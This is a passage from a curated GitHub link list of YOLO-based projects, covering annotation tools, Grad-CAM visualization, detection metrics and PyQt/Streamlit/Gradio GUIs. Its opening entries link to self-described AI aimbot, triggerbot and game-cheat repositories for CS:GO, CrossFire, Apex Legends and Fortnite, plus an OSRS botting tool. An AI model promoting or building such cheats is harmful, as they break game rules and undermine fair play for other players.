นๆฎๆ•™็จ‹ๅ†™็š„csgo-aiๅ’Œๆˆ‘่‡ชๅทฑ่ฎญ็ปƒ็š„ๆจกๅž‹๏ผŒ่ฟ˜ๆœ‰ๆ•ฐๆฎ้›†ใ€‚ - [Sequoia](https://github.com/IgaoGuru/Sequoia) <img src="https://img.shields.io/github/stars/IgaoGuru/Sequoia?style=social"/> : A neural network for CounterStrike:GlobalOffensive character detection and classification. Built on a custom-made dataset (csgo-data-collector). - [ItGarbager/aimcf_yolov5](https://github.com/ItGarbager/aimcf_yolov5) <img src="https://img.shields.io/github/stars/ItGarbager/aimcf_yolov5?style=social"/> : ไฝฟ็”จyolov5็ฎ—ๆณ•ๅฎž็Žฐcf่ง’่‰ฒๅคด้ƒจ้ข„ๆต‹ใ€‚ - [jiaran-takeme/Target-Detection-for-CSGO-by-YOLOv5](https://github.com/jiaran-takeme/Target-Detection-for-CSGO-by-YOLOv5) <img src="https://img.shields.io/github/stars/jiaran-takeme/Target-Detection-for-CSGO-by-YOLOv5?style=social"/> : Target Detection for CSGO by YOLOv5. - [Lucid1ty/Yolov5ForCSGO](https://github.com/Lucid1ty/Yolov5ForCSGO) <img src="https://img.shields.io/github/stars/Lucid1ty/Yolov5ForCSGO?style=social"/> : CSGO character detection and auto aim. - [leo4048111/Yolov5-LabelMaker-For-CSGO](https://github.com/leo4048111/Yolov5-LabelMaker-For-CSGO) <img src="https://img.shields.io/github/stars/leo4048111/Yolov5-LabelMaker-For-CSGO?style=social"/> : A simple tool for making CSGO dataset in YOLO format. - [soloist-v/AutoStrike](https://github.com/soloist-v/AutoStrike) <img src="https://img.shields.io/github/stars/soloist-v/AutoStrike?style=social"/> : ไฝฟ็”จyolov5่‡ชๅŠจ็ž„ๅ‡†๏ผŒๆ”ฏๆŒfpsๆธธๆˆ ้ผ ๆ ‡็งปๅŠจๆŽงๅˆถ้œ€่ฆ่‡ช่กŒ่ฐƒๆ•ดใ€‚ - [slyautomation/osrs_yolov5](https://github.com/slyautomation/osrs_yolov5) <img src="https://img.shields.io/github/stars/slyautomation/osrs_yolov5?style=social"/> : Yolov5 Object Detection In OSRS using Python code, Detecting Cows - Botting. - [HarunoWindy/yolo-games-weights](https://github.com/HarunoWindy/yolo-games-weights) <img src="https://img.shields.io/github/stars/HarunoWindy/yolo-games-weights?style=social"/> : YOLOv5 vision deep-learning on detect games UI (current support: onmyoji) YOLOv5ๆทฑๅบฆๅญฆไน ่ฏ†ๅˆซๆธธๆˆUI(็›ฎๅ‰ๆ”ฏๆŒ๏ผš้˜ด้˜ณๅธˆ). - [mrathena/python.yolo.csgo.autoaim.helper](https://github.com/mrathena/python.yolo.csgo.autoaim.helper) <img src="https://img.shields.io/github/stars/mrathena/python.yolo.csgo.autoaim.helper?style=social"/> : Python Yolo v5 6.2 Csgo. - [Aa-bN/AimYolo](https://github.com/Aa-bN/AimYolo) <img src="https://img.shields.io/github/stars/Aa-bN/AimYolo?style=social"/> : AIๅค–ๆŒ‚โ€”โ€”ๅŸบไบŽYOLOv5็š„ๅฐ„ๅ‡ป็ฑปๆธธๆˆ็ž„ๅ‡†่พ…ๅŠฉใ€‚An AI plug-in - targeting aid for shooting games based on YOLOv5. - [suixin1424/cf-yolo-trt](https://github.com/suixin1424/cf-yolo-trt) <img src="https://img.shields.io/github/stars/suixin1424/cf-yolo-trt?style=social"/> : ๅŸบไบŽyolov5-trt็š„็ฉฟ่ถŠ็ซ็บฟai่‡ช็ž„ใ€‚ - [DuGuYifei/Yolov5_FPS_AICheatPrinciple](https://github.com/DuGuYifei/Yolov5_FPS_AICheatPrinciple) <img src="https://img.shields.io/github/stars/DuGuYifei/Yolov5_FPS_AICheatPrinciple?style=social"/> : The AI cheating principle of fps game. (This is only used for learning). - [MistyAI/MistyFN](https://github.com/MistyAI/MistyFN) <img src="https://img.shields.io/github/stars/MistyAI/MistyFN?style=social"/> : Aimbot and Triggerbot for Fortnite based on artificial intelligence. - [suixin1424/crossfire-yolo-TensorRT](https://github.com/suixin1424/crossfire-yolo-TensorRT) <img src="https://img.shields.io/github/stars/suixin1424/crossfire-yolo-TensorRT?style=social"/> : crossfire-yolo-TensorRT. ๅŸบไบŽyolo-trt็š„็ฉฟ่ถŠ็ซ็บฟai่‡ช็ž„ใ€‚ - [EthanH3514/AL_Yolo](https://github.com/EthanH3514/AL_Yolo) <img src="https://img.shields.io/github/stars/EthanH3514/AL_Yolo?style=social"/> : ๅŸบไบŽYolov5็š„Apex Legendๆธธๆˆ AI ่พ…็ž„ๅค–ๆŒ‚ใ€‚ - [SunOner/yolov8_aimbot](https://github.com/SunOner/yolov8_aimbot) <img src="https://img.shields.io/github/stars/SunOner/yolov8_aimbot?style=social"/> : Aim-bot based on AI for all FPS games. - [bigQY/calabiyau-cheat](https://github.com/bigQY/calabiyau-cheat) <img src="https://img.shields.io/github/stars/bigQY/calabiyau-cheat?style=social"/> : ๅŸบไบŽyolov10็š„ๅกๆ‹‰ๅฝผไธ˜่‡ช็ž„ใ€‚ - ### Automatic Annotation Tools #### ่‡ชๅŠจๆ ‡ๆณจๅทฅๅ…ท - [Label Studio](https://github.com/HumanSignal/label-studio) <img src="https://img.shields.io/github/stars/HumanSignal/label-studio?style=social"/> : Label Studio is a multi-type data labeling and annotation tool with standardized output format. [labelstud.io](https://labelstud.io/) - [AnyLabeling](https://github.com/vietanhdev/anylabeling) <img src="https://img.shields.io/github/stars/vietanhdev/anylabeling?style=social"/> : ๐ŸŒŸ AnyLabeling ๐ŸŒŸ. Effortless AI-assisted data labeling with AI support from YOLO, Segment Anything, MobileSAM!! [anylabeling.nrl.ai](https://anylabeling.nrl.ai/) - [X-AnyLabeling](https://github.com/CVHub520/X-AnyLabeling) <img src="https://img.shields.io/github/stars/CVHub520/X-AnyLabeling?style=social"/> : ๐Ÿ’ซ X-AnyLabeling ๐Ÿ’ซ. X-AnyLabeling๏ผšไธ€ๆฌพๅคš SOTA ๆจกๅž‹้›†ๆˆ็š„้ซ˜็บง่‡ชๅŠจๆ ‡ๆณจๅทฅๅ…ท๏ผ Effortless data labeling with AI support from Segment Anything and other awesome models. - [Label Anything](https://github.com/open-mmlab/playground/tree/main/label_anything) <img src="https://img.shields.io/github/stars/open-mmlab/playground?style=social"/> : OpenMMLab PlayGround: Semi-Automated Annotation with Label-Studio and SAM. - [LabelImg](https://github.com/heartexlabs/labelImg) <img src="https://img.shields.io/github/stars/heartexlabs/labelImg?style=social"/> : ๐Ÿ–๏ธ LabelImg is a graphical image annotation tool and label object bounding boxes in images. - [labelme](https://github.com/wkentaro/labelme) <img src="https://img.shields.io/github/stars/wkentaro/labelme?style=social"/> : Image Polygonal Annotation with Python (polygon, rectangle, circle, line, point and image-level flag annotation). - [DarkLabel](https://github.com/darkpgmr/DarkLabel) <img src="https://img.shields.io/github/stars/darkpgmr/DarkLabel?style=social"/> : Video/Image Labeling and Annotation Tool. - [AlexeyAB/Yolo_mark](https://github.com/AlexeyAB/Yolo_mark) <img src="https://img.shields.io/github/stars/AlexeyAB/Yolo_mark?style=social"/> : GUI for marking bounded boxes of objects in images for training neural network Yolo v3 and v2. - [Cartucho/OpenLabeling](https://github.com/Cartucho/OpenLabeling) <img src="https://img.shields.io/github/stars/Cartucho/OpenLabeling?style=social"/> : Label images and video for Computer Vision applications. - [CVAT](https://github.com/cvat-ai/cvat) <img src="https://img.shields.io/github/stars/cvat-ai/cvat?style=social"/> : Computer Vision Annotation Tool (CVAT). Annotate better with CVAT, the industry-leading data engine for machine learning. Used and trusted by teams at any scale, for data of any scale. - [VoTT](https://github.com/Microsoft/VoTT) <img src="https://img.shields.io/github/stars/Microsoft/VoTT?style=social"/> : Visual Object Tagging Tool: An electron app for building end to end Object Detection Models from Images and Videos. - [WangRongsheng/KDAT](https://github.com/WangRongsheng/KDAT) <img src="https://img.shields.io/github/stars/WangRongsheng/KDAT?style=social"/> : ไธ€ไธชไธ“ไธบ่ง†่ง‰ๆ–นๅ‘็›ฎๆ ‡ๆฃ€ๆต‹ๅ…จๆต็จ‹็š„ๆ ‡ๆณจๅทฅๅ…ท้›†๏ผŒๅ…จ็งฐ๏ผšKill Object Detection Annotation Toolsใ€‚ - [Rectlabel-support](https://github.com/ryouchinsa/Rectlabel-support) <img src="https://img.shields.io/github/stars/ryouchinsa/Rectlabel-support?style=social"/> : RectLabel - An image annotation tool to label images for bounding box object detection and segmentation. - [cnyvfang/labelGo-Yolov5AutoLabelImg](https://github.com/cnyvfang/labelGo-Yolov5AutoLabelImg) <img src="https://img.shields.io/github/stars/cnyvfang/labelGo-Yolov5AutoLabelImg?style=social"/> : ๐Ÿ’•YOLOV5 semi-automatic annotation tool (Based on labelImg)๐Ÿ’•ไธ€ไธชๅŸบไบŽlabelImgๅŠYOLOV5็š„ๅ›พๅฝขๅŒ–ๅŠ่‡ชๅŠจๆ ‡ๆณจๅทฅๅ…ทใ€‚ - [CVUsers/Auto_maker](https://github.com/CVUsers/Auto_maker) <img src="https://img.shields.io/github/stars/CVUsers/Auto_maker?style=social"/> : ๆทฑๅบฆๅญฆไน ๆ•ฐๆฎ่‡ชๅŠจๆ ‡ๆณจๅ™จๅผ€ๆบ ็›ฎๆ ‡ๆฃ€ๆต‹ๅ’Œๅ›พๅƒๅˆ†็ฑป๏ผˆ้ซ˜็ฒพๅบฆ้ซ˜ๆ•ˆ็Ž‡๏ผ‰ใ€‚ - [MyVision](https://github.com/OvidijusParsiunas/myvision) <img src="https://img.shields.io/github/stars/OvidijusParsiunas/myvision?style=social"/> : Computer vision based ML training data generation tool ๐Ÿš€ - [wufan-tb/AutoLabelImg](https://github.com/wufan-tb/AutoLabelImg) <img src="https://img.shields.io/github/stars/wufan-tb/AutoLabelImg?style=social"/> : auto-labelimg based on yolov5, with many other useful tools. AutoLabelImg ๅคšๅŠŸ่ƒฝ่‡ชๅŠจๆ ‡ๆณจๅทฅๅ…ทใ€‚ - [MrZander/YoloMarkNet](https://github.com/MrZander/YoloMarkNet) <img src="https://img.shields.io/github/stars/MrZander/YoloMarkNet?style=social"/> : Darknet YOLOv2/3 annotation tool written in C#/WPF. - [mahxn0/Yolov3_ForTextLabel](https://github.com/mahxn0/Yolov3_ForTextLabel) <img src="https://img.shields.io/github/stars/mahxn0/Yolov3_ForTextLabel?style=social"/> : ๅŸบไบŽyolov3็š„็›ฎๆ ‡/่‡ช็„ถๅœบๆ™ฏๆ–‡ๅญ—่‡ชๅŠจๆ ‡ๆณจๅทฅๅ…ทใ€‚ - [MNConnor/YoloV5-AI-Label](https://github.com/MNConnor/YoloV5-AI-Label) <img src="https://img.shields.io/github/stars/MNConnor/YoloV5-AI-Label?style=social"/> : YoloV5 AI Assisted Labeling. - [LILINOpenGitHub/Labeling-Tool](https://github.com/LILINOpenGitHub/Labeling-Tool) <img src="https://img.shields.io/github/stars/LILINOpenGitHub/Labeling-Tool?style=social"/> : Free YOLO AI labeling tool. YOLO AI labeling tool is a Windows app for labeling YOLO dataset. - [whs0523003/YOLOv5_6.1_autolabel](https://github.com/whs0523003/YOLOv5_6.1_autolabel) <img src="https://img.shields.io/github/stars/whs0523003/YOLOv5_6.1_autolabel?style=social"/> : YOLOv5_6.1 ่‡ชๅŠจๆ ‡่ฎฐ็›ฎๆ ‡ๆก†ใ€‚ - [2vin/PyYAT](https://github.com/2vin/PyYAT) <img src="https://img.shields.io/github/stars/2vin/PyYAT?style=social"/> : Semi-Automatic Yolo Annotation Tool In Python. - [AlturosDestinations/Alturos.ImageAnnotation](https://github.com/AlturosDestinations/Alturos.ImageAnnotation) <img src="https://img.shields.io/github/stars/AlturosDestinations/Alturos.ImageAnnotation?style=social"/> : A collaborative tool for labeling image data for yolo. - [stephanecharette/DarkMark](https://github.com/stephanecharette/DarkMark) <img src="https://img.shields.io/github/stars/stephanecharette/DarkMark?style=social"/> : Marking up images for use with Darknet. - [2vin/yolo_annotation_tool](https://github.com/2vin/yolo_annotation_tool) <img src="https://img.shields.io/github/stars/2vin/yolo_annotation_tool?style=social"/> : Annotation tool for YOLO in opencv. - [sanfooh/quick_yolo2_label_tool](https://github.com/sanfooh/quick_yolo2_label_tool) <img src="https://img.shields.io/github/stars/sanfooh/quick_yolo2_label_tool?style=social"/> : yoloๅฟซ้€Ÿๆ ‡ๆณจๅทฅๅ…ท quick yolo2 label tool. - [folkien/yaya](https://github.com/folkien/yaya) <img src="https://img.shields.io/github/stars/folkien/yaya?style=social"/> : YAYA - Yet annother YOLO annoter for images (in QT5). Support yolo format, image modifications, labeling and detecting with previously trained detector. - [pylabel-project/pylabel](https://github.com/pylabel-project/pylabel) <img src="https://img.shields.io/github/stars/pylabel-project/pylabel?style=social"/> : Python library for computer vision labeling tasks. The core functionality is to translate bounding box annotations between different formats-for example, from coco to yolo. - [opendatalab/labelU](https://github.com/opendatalab/labelU) <img src="https://img.shields.io/github/stars/opendatalab/labelU?style=social"/> : Uniform, Unlimited, Universal and Unbelievable Annotation Toolbox. - ### Feature Map Visualization #### ็‰นๅพๅ›พๅฏ่ง†ๅŒ– - [pooya-mohammadi/yolov5-gradcam](https://github.com/pooya-mohammadi/yolov5-gradcam) <img src="https://img.shields.io/github/stars/pooya-mohammadi/yolov5-gradcam?style=social"/> : Visualizing Yolov5's layers using GradCam. - [TorchCAM](https://github.com/frgfm/torch-cam) <img src="https://img.shields.io/github/stars/frgfm/torch-cam?style=social"/> : Class activation maps for your PyTorch models (CAM, Grad-CAM, Grad-CAM++, Smooth Grad-CAM++, Score-CAM, SS-CAM, IS-CAM, XGrad-CAM, Layer-CAM). - [Him-wen/OD_Heatmap](https://github.com/Him-wen/OD_Heatmap) <img src="https://img.shields.io/github/stars/Him-wen/OD_Heatmap?style=social"/> : Heatmap visualization of the YOLO model using the Grad-CAM heatmap visualization method can Intuitively show which regions in the image contribute the most to the category classification. - ### Object Detection Evaluation Metrics #### ็›ฎๆ ‡ๆฃ€ๆต‹ๆ€ง่ƒฝ่ฏ„ไปทๆŒ‡ๆ ‡ - [rafaelpadilla/review_object_detection_metrics](https://github.com/rafaelpadilla/review_object_detection_metrics) <img src="https://img.shields.io/github/stars/rafaelpadilla/review_object_detection_metrics?style=social"/> : Object Detection Metrics. 14 object detection metrics: mean Average Precision (mAP), Average Recall (AR), Spatio-Temporal Tube Average Precision (STT-AP). This project supports different bounding box formats as in COCO, PASCAL, Imagenet, etc. "A Comparative Analysis of Object Detection Metrics with a Companion Open-Source Toolkit". (**[Electronics 2021](https://www.mdpi.com/2079-9292/10/3/279)**) - [rafaelpadilla/Object-Detection-Metrics](https://github.com/rafaelpadilla/Object-Detection-Metrics) <img src="https://img.shields.io/github/stars/rafaelpadilla/Object-Detection-Metrics?style=social"/> : Most popular metrics used to evaluate object detection algorithms. "A Survey on Performance Metrics for Object-Detection Algorithms". (**[IWSSIP 2020](https://ieeexplore.ieee.org/abstract/document/9145130)**) - [Cartucho/mAP](https://github.com/Cartucho/mAP) <img src="https://img.shields.io/github/stars/Cartucho/mAP?style=social"/> : mean Average Precision - This code evaluates the performance of your neural net for object recognition. - [Lightning-AI/metrics](https://github.com/Lightning-AI/metrics) <img src="https://img.shields.io/github/stars/Lightning-AI/metrics?style=social"/> : Machine learning metrics for distributed, scalable PyTorch applications. - [open-mmlab/mmeval](https://github.com/open-mmlab/mmeval) <img src="https://img.shields.io/github/stars/open-mmlab/mmeval?style=social"/> : MMEval is a machine learning evaluation library that supports efficient and accurate distributed evaluation on a variety of machine learning frameworks. - [laclouis5/globox](https://github.com/laclouis5/globox) <img src="https://img.shields.io/github/stars/laclouis5/globox?style=social"/> : A package to read and convert object detection databases (COCO, YOLO, PascalVOC, LabelMe, CVAT, OpenImage, ...) and evaluate them with COCO and PascalVOC metrics. - ### GUI #### ๅ›พๅฝข็”จๆˆท็•Œ้ข - #### Streamlit-Related - [wjnwjn59/YOLOv10_Streamlit_Demo](https://github.com/wjnwjn59/YOLOv10_Streamlit_Demo) <img src="https://img.shields.io/github/stars/wjnwjn59/YOLOv10_Streamlit_Demo?style=social"/> : A simple object detection web demo using YOLOv10 and Streamlit. - [streamlit/demo-self-driving](https://github.com/streamlit/demo-self-driving) <img src="https://img.shields.io/github/stars/streamlit/demo-self-driving?style=social"/> : Streamlit app demonstrating an image browser for the Udacity self-driving-car dataset with realtime object detection using YOLO. - [CodingMantras/yolov8-streamlit-detection-tracking](https://github.com/CodingMantras/yolov8-streamlit-detection-tracking) <img src="https://img.shields.io/github/stars/CodingMantras/yolov8-streamlit-detection-tracking?style=social"/> : Object detection and tracking algorithm implemented for Real-Time video streams and static images. - [JackDance/YOLOv8-streamlit-app](https://github.com/JackDance/YOLOv8-streamlit-app) <img src="https://img.shields.io/github/stars/JackDance/YOLOv8-streamlit-app?style=social"/> : ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ Use streamlit framework to increase yolov8 front-end page interaction function. "็ŸฅไนŽใ€ŒMr.Luyaoใ€ใ€Š[ๆทฑๅบฆๅญฆไน /ๆœบๅ™จๅญฆไน ้กน็›ฎ็š„ๅ‰็ซฏๅฑ•็คบๅˆฉๅ™จ--Streamlit](https://zhuanlan.zhihu.com/p/630029493)ใ€‹"ใ€‚ - [xugaoxiang/yolov5-streamlit](https://github.com/xugaoxiang/yolov5-streamlit) <img src="https://img.shields.io/github/stars/xugaoxiang/yolov5-streamlit?style=social"/> : Deploy YOLOv5 detection with Streamlit. - [Kedreamix/YoloGesture](https://github.com/Kedreamix/YoloGesture) <img src="https://img.shields.io/github/stars/Kedreamix/YoloGesture?style=social"/> : ๅŸบไบŽ่ฎก็ฎ—ๆœบ่ง†่ง‰ๆ‰‹ๅŠฟ่ฏ†ๅˆซๆŽงๅˆถ็ณป็ปŸYoLoGesture (ๅˆฉ็”จYOLOๅฎž็Žฐ)๏ผŒๅˆฉ็”จyolo่ฟ›่กŒๆ‰‹ๅŠฟ่ฏ†ๅˆซ็š„ๆŽงๅˆถ็ณป็ปŸ๏ผŒๆœ€ๅŽๅˆฉ็”จstreamlit่ฟ›่กŒไบ†้ƒจ็ฝฒใ€‚ - #### Gradio-Related - [zyds/yolov5-code](https://github.com/zyds/yolov5-code) <img src="https://img.shields.io/github/stars/zyds/yolov5-code?style=social"/> : ๆ‰‹ๆŠŠๆ‰‹ๅธฆไฝ ๅฎžๆˆ˜ YOLOv5ใ€‚ - [KdaiP/yolov8-deepsort-tracking](https://github.com/KdaiP/yolov8-deepsort-tracking) <img src="https://img.shields.io/github/stars/KdaiP/yolov8-deepsort-tracking?style=social"/> : opencv+yolov8+deepsort่กŒไบบๆฃ€ๆต‹ไธŽ่ทŸ่ธช,ไปฅๅŠๅฏ้€‰็š„WebUI็•Œ้ข๏ผˆๅŸบไบŽgradio๏ผ‰ใ€‚ - #### QT-Related - [Ai-trainee/Traffic-Sign-Recognition-PyQt5-YOLOv5-GUI](https://github.com/Ai-trainee/Traffic-Sign-Recognition-PyQt5-YOLOv5-GUI) <img src="https://img.shields.io/github/stars/Ai-trainee/Traffic-Sign-Recognition-PyQt5-YOLOv5-GUI?style=social"/> : Road Sign Recognition Project Based on YOLOv5. This is a road sign recognition project based on YOLOv5, developed with a PyQt5 interface, YOLOv5 trained model, and MySQL database. ่ฟ™ๆ˜ฏไธ€ไธชๅŸบไบŽYOLOv5๐Ÿš€็š„้“่ทฏๆ ‡ๅฟ—่ฏ†ๅˆซ็ณป็ปŸ๐Ÿ˜Š๏ผŒไฝฟ็”จไบ†MySQLๆ•ฐๆฎๅบ“๐Ÿ’ฝ๏ผŒPyQt5่ฟ›่กŒ็•Œ้ข่ฎพ่ฎก๐ŸŽจ๏ผŒPyTorchๆทฑๅบฆๅญฆไน ๆก†ๆžถๅ’ŒTensorRT่ฟ›่กŒๅŠ ้€Ÿโšก๏ผŒๅŒๆ—ถๅŒ…ๅซไบ†CSSๆ ทๅผ๐ŸŒˆใ€‚็ณป็ปŸ็”ฑไบ”ไธชไธป่ฆๆจกๅ—็ป„ๆˆ๏ผš็ณป็ปŸ็™ปๅฝ•ๆจกๅ—๐Ÿ”‘่ดŸ่ดฃ็”จๆˆท็™ป้™†๏ผ›ๅˆๅง‹ๅŒ–ๅ‚ๆ•ฐๆจกๅ—๐Ÿ“‹ๆไพ›YOLOv5ๆจกๅž‹็š„ๅˆๅง‹ๅŒ–ๅ‚ๆ•ฐ่ฎพ็ฝฎ๏ผ›ๆ ‡ๅฟ—่ฏ†ๅˆซๆจกๅ—๐Ÿ”ๆ˜ฏ็ณป็ปŸ็š„ๆ ธๅฟƒ๏ผŒ่ดŸ่ดฃๅฏน้“่ทฏๆ ‡ๅฟ—่ฟ›่กŒ่ฏ†ๅˆซๅนถๅฐ†็ป“ๆžœๅฏผๅ…ฅๆ•ฐๆฎๅบ“๏ผ›ๆ•ฐๆฎๅบ“ๆจกๅ—๐Ÿ’พๅŒ…ๅซๅŸบๆœฌๆ•ฐๆฎๅบ“ๆ“ไฝœๅ’Œๆ•ฐๆฎๅˆ†ๆžไธคไธชๅญๆจกๅ—๏ผ›ๅ›พๅƒๅค„็†ๆจกๅ—๐Ÿ–ผ๏ธ่ดŸ่ดฃๅ•ไธชๅ›พๅƒ็š„ๅค„็†ๅ’Œๆ•ฐๆฎๅขžๅผบใ€‚ๆ•ดไธช็ณป็ปŸๆ”ฏๆŒๅคš็งๆ•ฐๆฎ่พ“ๅ…ฅๅ’Œๆจกๅž‹ๅˆ‡ๆข๏ผŒๆไพ›ไบ†ๅŒ…ๆ‹ฌmossicๅ’Œmixupๅœจๅ†…็š„ๅ›พๅƒๅขžๅผบๆ–นๆณ•๐Ÿ“ˆใ€‚ - [parker-int64/yolov5-RGBD](https://github.com/parker-int64/yolov5-RGBD) <img src="https://img.shields.io/github/stars/parker-int64/yolov5-RGBD?style=social"/> : Qt QML based yolov5 + RGBD camera program. - [Aimol-l/qml_with_yolov7](https://github.com/Aimol-l/qml_with_yolov7) <img src="https://img.shields.io/github/stars/Aimol-l/qml_with_yolov7?style=social"/> : ็”จYOLOV7+ByteTrack็š„ๆ–นๆณ•่ฏ†ๅˆซ่ง†้ข‘/่ง†้ข‘ๆต๏ผŒ็”จQML็ป˜ๅˆถGUI๏ผŒๅนถๅธฆๆœ‰็ปŸ่ฎกไฟกๆฏใ€‚ - [xietx1995/YOLO-QT-Camera-Tool](https://github.com/xietx1995/YOLO-QT-Camera-Tool) <img src="https://img.shields.io/github/stars/xietx1995/YOLO-QT-Camera-Tool?style=social"/> : Detecting objects from camera or local video files vi qt and yolo. - [Javacr/PyQt5-YOLOv5](https://github.com/Javacr/PyQt5-YOLOv5) <img src="https://img.shields.io/github/stars/Javacr/PyQt5-YOLOv5?style=social"/> : YOLOv5ๆฃ€ๆต‹็•Œ้ข-PyQt5ๅฎž็Žฐใ€‚ - [zstar1003/yolov5_pyqt5](https://github.com/zstar1003/yolov5_pyqt5) <img src="https://img.shields.io/github/stars/zstar1003/yolov5_pyqt5?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชไฝฟ็”จpyqt5ๆญๅปบYOLOv5็›ฎๆ ‡ๆฃ€ๆต‹ๅฏ่ง†ๅŒ–็จ‹ๅบใ€‚ - [scutlrr/Yolov4-QtGUI](https://github.com/scutlrr/Yolov4-QtGUI) <img src="https://img.shields.io/github/stars/scutlrr/Yolov4-QtGUI?style=social"/> : Yolov4-QtGUIๆ˜ฏๅŸบไบŽ[QtGuiDemo](https://github.com/jmu201521121021/QtGuiDemo)้กน็›ฎๅผ€ๅ‘็š„ๅฏ่ง†ๅŒ–็›ฎๆ ‡ๆฃ€ๆต‹็•Œ้ข๏ผŒๅฏไปฅ็ฎ€ไพฟ้€‰ๆ‹ฉๆœฌๅœฐๅ›พ็‰‡ใ€ๆ‘„ๅƒๅคดๆฅๅฑ•็คบๅ›พๅƒๅค„็†็ฎ—ๆณ•็š„็ป“ๆžœใ€‚ - [xugaoxiang/yolov5-pyqt5](https://github.com/xugaoxiang/yolov5-pyqt5) <img src="https://img.shields.io/github/stars/xugaoxiang/yolov5-pyqt5?style=social"/> : ็ป™yolov5ๅŠ ไธชgui็•Œ้ข๏ผŒไฝฟ็”จpyqt5๏ผŒyolov5ๆ˜ฏ5.0็‰ˆๆœฌใ€‚ - [mxy493/YOLOv5-Qt](https://github.com/mxy493/YOLOv5-Qt) <img src="https://img.shields.io/github/stars/mxy493/YOLOv5-Qt?style=social"/> : ๅŸบไบŽYOLOv5็š„GUI็จ‹ๅบ๏ผŒๆ”ฏๆŒ้€‰ๆ‹ฉ่ฆไฝฟ็”จ็š„ๆƒ้‡ๆ–‡ไปถ๏ผŒ่ฎพ็ฝฎๆ˜ฏๅฆไฝฟ็”จGPU๏ผŒ่ฎพ็ฝฎ็ฝฎไฟกๅบฆ้˜ˆๅ€ผ็ญ‰ๅ‚ๆ•ฐใ€‚ - [BonesCat/YoloV5_PyQt5](https://github.com/BonesCat/YoloV5_PyQt5) <img src="https://img.shields.io/github/stars/BonesCat/YoloV5_PyQt5?style=social"/> : Add gui for YoloV5 using PyQt5. - [LuckyBoy1798/yolov5-pyqt](https://github.com/LuckyBoy1798/yolov5-pyqt) <img src="https://img.shields.io/github/stars/LuckyBoy1798/yolov5-pyqt?style=social"/> : ๅŸบไบŽyolov5+pyqt็š„็”ฒ้ชจๆ–‡ๅ›พๅฝขๅŒ–ๆฃ€ๆต‹ๅทฅๅ…ทใ€‚ - [PySimpleGUI/PySimpleGUI-YOLO](https://github.com/PySimpleGUI/PySimpleGUI-YOLO) <img src="https://img.shields.io/github/stars/PySimpleGUI/PySimpleGUI-YOLO?style=social"/> : A YOLO Artificial Intelligence algorithm demonstration using PySimpleGUI. - [prabindh/qt5-opencv3-darknet](https://github.com/prabindh/qt5-opencv3-darknet) <img src="https://img.shields.io/github/stars/prabindh/qt5-opencv3-darknet?style=social"/> : Qt5 + Darknet/Yolo + OpenCV3. - [GinkgoX/YOLOv3GUI_Pytorch_PyQt5](https://github.com/GinkgoX/YOLOv3GUI_Pytorch_PyQt5) <img src="https://img.shields.io/github/stars/GinkgoX/YOLOv3GUI_Pytorch_PyQt5?style=social"/> : This is a GUI project for Deep Learning Object Detection based on YOLOv3 model. - [FatemeZamanian/Yolov5-Fruit-Detector](https://github.com/FatemeZamanian/Yolov5-Fruit-Detector) <img src="https://img.shields.io/github/stars/FatemeZamanian/Yolov5-Fruit-Detector?style=social"/> : A program to recognize fruits on pictures or videos using yolov5. - [BioMeasure/PyQt5_YoLoV5_DeepSort](https://github.com/BioMeasure/PyQt5_YoLoV5_DeepSort) <img src="https://img.shields.io/github/stars/BioMeasure/PyQt5_YoLoV5_DeepSort?style=social"/> : This is a PyQt5 GUI program, which is based on YoloV5 and DeepSort to track person. - [DongLizhong/YOLO_SORT_QT](https://github.com/DongLizhong/YOLO_SORT_QT) <img src="https://img.shields.io/github/stars/DongLizhong/YOLO_SORT_QT?style=social"/> : This code uses the opencv dnn module to load the darknet model for detection and add SORT for multi-object tracking(MOT). - [Whu-wxy/yolov5_deepsort_ncnn_qt](https://github.com/Whu-wxy/yolov5_deepsort_ncnn_qt) <img src="https://img.shields.io/github/stars/Whu-wxy/yolov5_deepsort_ncnn_qt?style=social"/> : ็”จncnn่ฐƒ็”จyolov5ๅ’Œdeep sortๆจกๅž‹๏ผŒopencv่ฏปๅ–่ง†้ข‘ใ€‚ - [jeswanthgalla/PyQt4_GUI_darknet_yolov4](https://github.com/jeswanthgalla/PyQt4_GUI_darknet_yolov4) <img src="https://img.shields.io/github/stars/jeswanthgalla/PyQt4_GUI_darknet_yolov4?style=social"/> : GUI App using PyQt4. Multithreading to process multiple camera streams and using darknet yolov4 model for object detection. - [barleo01/yoloobjectdetector](https://github.com/barleo01/yoloobjectdetector) <img src="https://img.shields.io/github/stars/barleo01/yoloobjectdetector?style=social"/> : The pupose of this application is to capture video from a camera, apply a YOLO Object detector and display it on a simple Qt Gui. - [Eagle104fred/PyQt5-Yolov5](https://github.com/Eagle104fred/PyQt5-Yolov5) <img src="https://img.shields.io/github/stars/Eagle104fred/PyQt5-Yolov5?style=social"/> : ๆŠŠYOLOv5็š„่ง†้ข‘ๆ˜พ็คบๅˆฐpyqt5uiไธŠใ€‚ - [cnyvfang/YOLOv5-GUI](https://github.com/cnyvfang/YOLOv5-GUI) <img src="https://img.shields.io/github/stars/Eagle104fred/PyQt5-Yolov5?style=social"/> : Qt-GUI implementation of the YOLOv5 algorithm (ver.6 and ver.5). YOLOv5็ฎ—ๆณ•(ver.6ๅŠver.5)็š„Qt-GUIๅฎž็Žฐใ€‚ - [WeNN-Artificial-Intelligence/PyQT-Object-Detection-App](https://github.com/WeNN-Artificial-Intelligence/PyQT-Object-Detection-App) <img src="https://img.shields.io/github/stars/WeNN-Artificial-Intelligence/PyQT-Object-Detection-App?style=social"/> : Real-time object detection app with Python and PyQt framework. - [Powercube7/YOLOv5-GUI](https://github.com/Powercube7/YOLOv5-GUI) <img src="https://img.shields.io/github/stars/Powercube7/YOLOv5-GUI?style=social"/> : A simple GUI made for creating jobs in YOLOv5. - [cdmstrong/yolov5-pyqt-moke](https://github.com/cdmstrong/yolov5-pyqt-moke) <img src="https://img.shields.io/github/stars/cdmstrong/yolov5-pyqt-moke?style=social"/> : ๅˆฉ็”จyolov5ๅ’Œpyqtๅšๅฏ่ง†ๅŒ–ๆฃ€ๆต‹ใ€‚ - [GHigher12/Pyqt5_yolov5_unet_centernet](https://github.com/GHigher12/Pyqt5_yolov5_unet_centernet) <img src="https://img.shields.io/github/stars/GHigher12/Pyqt5_yolov5_unet_centernet?style=social"/> : ้›†yolov5ใ€centernetใ€unet็ฎ—ๆณ•็š„pyqt5็•Œ้ข๏ผŒๅฏๅฎž็Žฐๅ›พ็‰‡็›ฎๆ 